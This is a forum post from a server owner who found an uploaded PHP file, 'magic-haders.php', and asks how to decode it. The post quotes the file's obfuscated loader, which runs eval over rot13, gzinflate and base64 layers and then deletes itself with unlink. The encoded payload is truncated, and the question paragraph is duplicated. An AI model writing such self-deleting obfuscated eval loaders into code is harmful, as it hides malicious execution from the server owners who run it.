Just noticed that someone has tried to inject PHP code in one of my server. Not an issue as I don't do CGI or have PHP installed and anything uploaded as a file is treated as a plain file unless part of a formal workflow which would require credentials and various security checks 
However I'm just curious so can someone tell me how to extract the code that's probably some kind of trojan horse? The file is called 'magic-haders.php' and the code looks like:
<?php
# 383634
eval(str_rot13(gzinflate(str_rot13(base64_decode(' LXzFktxDk+7TW .... '))));
unlink(__FILE__);

However I'm just curious so can someone tell me how to extract the code that's probably some kind of trojan horse? The file is called 'magic-haders.php' and the code looks like:
<?php
# 383634
eval(str_rot13(gzinflate(str_rot13(base64_decode(' LXzFktxDk+7TW .... '))));
unlink(__FILE__);

If an HTTP transaction includes a file then it'll be recorded but that's all unless its a data file expected by the workflow the client is triggering but then the client would need to have passed a number of security checks and filters to access the workflow unless the workflow is a really benign public one 

Comment